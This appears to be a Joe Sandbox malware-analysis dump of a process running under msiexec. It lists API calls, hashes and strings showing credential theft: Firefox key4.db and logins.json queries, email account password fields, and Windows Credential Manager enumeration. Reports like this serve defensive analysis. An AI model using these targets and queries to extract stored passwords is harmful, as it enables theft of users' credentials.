                                                                                                        • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                                        • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00402869
                                                                                                          • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                        • _mbscpy.MSVCRT(?,?,67CB7B60,?,00000000), ref: 004028A3
                                                                                                          • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,67CB7B60,?,00000000), ref: 0040297B
                                                                                                          • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                        • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                        • API String ID: 1497257669-167382505
                                                                                                        • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                        • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                        • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                        • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                        • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                        • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                        • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                        • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                        • DeleteObject.GDI32(?), ref: 00401226
                                                                                                        • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                        • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                        • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                        • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                        • memset.MSVCRT ref: 0040128E
                                                                                                        • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                        • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                        • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 2998058495-0
                                                                                                        • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                        • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                        • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                        • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                        APIs
                                                                                                        • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                        • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                        • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                        • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                        • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                        • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                        • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcmp$memcpy
                                                                                                        • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                        • API String ID: 231171946-2189169393
                                                                                                        • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                        • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                        • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                        • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                        • API String ID: 633282248-1996832678
                                                                                                        • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                        • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                        • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                        • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00406782
                                                                                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                        • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                        • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                                        • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                        • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                                        • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                        • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                                        • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                                        • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                        • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                        • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                        • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                                        • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                        • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                        Strings
                                                                                                        • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                        • key4.db, xrefs: 00406756
                                                                                                        • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                        • , xrefs: 00406834
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memcmp$memsetstrlen
                                                                                                        • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                        • API String ID: 3614188050-3983245814
                                                                                                        • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                        • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                        • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                        • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040A973
                                                                                                        • memset.MSVCRT ref: 0040A996
                                                                                                        • memset.MSVCRT ref: 0040A9AC
                                                                                                        • memset.MSVCRT ref: 0040A9BC
                                                                                                        • sprintf.MSVCRT ref: 0040A9F0
                                                                                                        • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                                                                        • sprintf.MSVCRT ref: 0040AABE
                                                                                                        • _mbscat.MSVCRT ref: 0040AAED
                                                                                                          • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                                                                        • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                                                                        • sprintf.MSVCRT ref: 0040AB21
                                                                                                          • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                          • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                        • API String ID: 710961058-601624466
                                                                                                        • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                        • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                                        • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                        • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sprintf$memset$_mbscpy
                                                                                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                        • API String ID: 3402215030-3842416460
                                                                                                        • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                        • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                        • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                        • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65

APIs
  • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
  • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
  • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
  • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
  • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
  • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
  • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
  • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
• strlen.MSVCRT ref: 0040F139
• strlen.MSVCRT ref: 0040F147
• memset.MSVCRT ref: 0040F187
• strlen.MSVCRT ref: 0040F196
• strlen.MSVCRT ref: 0040F1A4
• memset.MSVCRT ref: 0040F1EA
• strlen.MSVCRT ref: 0040F1F9
• strlen.MSVCRT ref: 0040F207
• _strcmpi.MSVCRT ref: 0040F2B2
• _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
• _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
• String ID: logins.json$none$signons.sqlite$signons.txt
• API String ID: 2003275452-3138536805

APIs
• memset.MSVCRT ref: 0040C3F7
• GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
• strrchr.MSVCRT ref: 0040C417
• _mbscat.MSVCRT ref: 0040C431
• _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
• _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
• GetWindowPlacement.USER32(?,?), ref: 0040C50C
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
• String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
• API String ID: 1012775001-1343505058

APIs
• memset.MSVCRT ref: 00444612
  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
• strlen.MSVCRT ref: 0044462E
• memset.MSVCRT ref: 00444668
• memset.MSVCRT ref: 0044467C
• memset.MSVCRT ref: 00444690
• memset.MSVCRT ref: 004446B6
  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
  • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
• memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
• memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
• memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
• _mbscpy.MSVCRT(?,?), ref: 00444812
• memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
• memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: memcpymemset$strlen$_mbscpy
• String ID: salu
• API String ID: 3691931180-4177317985

APIs
• LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
• GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
• GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
• FreeLibrary.KERNEL32(00000000), ref: 004100C4
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
• API String ID: 2449869053-232097475

APIs
• sprintf.MSVCRT ref: 0040957B
• LoadMenuA.USER32(?,?), ref: 00409589
  • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
  • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
  • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
  • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
• DestroyMenu.USER32(00000000), ref: 004095A7
• sprintf.MSVCRT ref: 004095EB
• CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
• memset.MSVCRT ref: 0040961C
• GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
• EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
• DestroyWindow.USER32(00000000), ref: 0040965C
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
• String ID: caption$dialog_%d$menu_%d
• API String ID: 3259144588-3822380221

APIs
  • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
• LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
• GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
• GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
• GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
• GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
• GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
• API String ID: 2449869053-4258758744

APIs
• wcsstr.MSVCRT ref: 0040426A
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
• _mbscpy.MSVCRT(?,?), ref: 004042D5
• _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
• strchr.MSVCRT ref: 004042F6
• strlen.MSVCRT ref: 0040430A
• sprintf.MSVCRT ref: 0040432B
• strchr.MSVCRT ref: 0040433C
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
• String ID: %s@gmail.com$www.google.com
• API String ID: 3866421160-4070641962

APIs
• _mbscpy.MSVCRT(0045A448,?), ref: 00409749
• _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
  • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
  • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
  • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
• EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
• EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
• _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
• memset.MSVCRT ref: 004097BD
• LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
• String ID: TranslatorName$TranslatorURL$general$strings
• API String ID: 1035899707-3647959541
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                        • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                        • API String ID: 2360744853-2229823034
                                                                                                        APIs
                                                                                                        • strchr.MSVCRT ref: 004100E4
                                                                                                        • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                          • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                          • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                          • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                        • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                        • _mbscat.MSVCRT ref: 0041014D
                                                                                                        • memset.MSVCRT ref: 00410129
                                                                                                          • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                          • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                        • memset.MSVCRT ref: 00410171
                                                                                                        • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                        • _mbscat.MSVCRT ref: 00410197
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                        • String ID: \systemroot
                                                                                                        • API String ID: 912701516-1821301763
                                                                                                        APIs
                                                                                                        • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                        • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                        • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                        • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                        • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                        Strings
                                                                                                        • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                        • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                        • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                        • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                        • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                        • API String ID: 1640410171-2022683286
                                                                                                        APIs
                                                                                                          • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                        • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                        • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                        • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
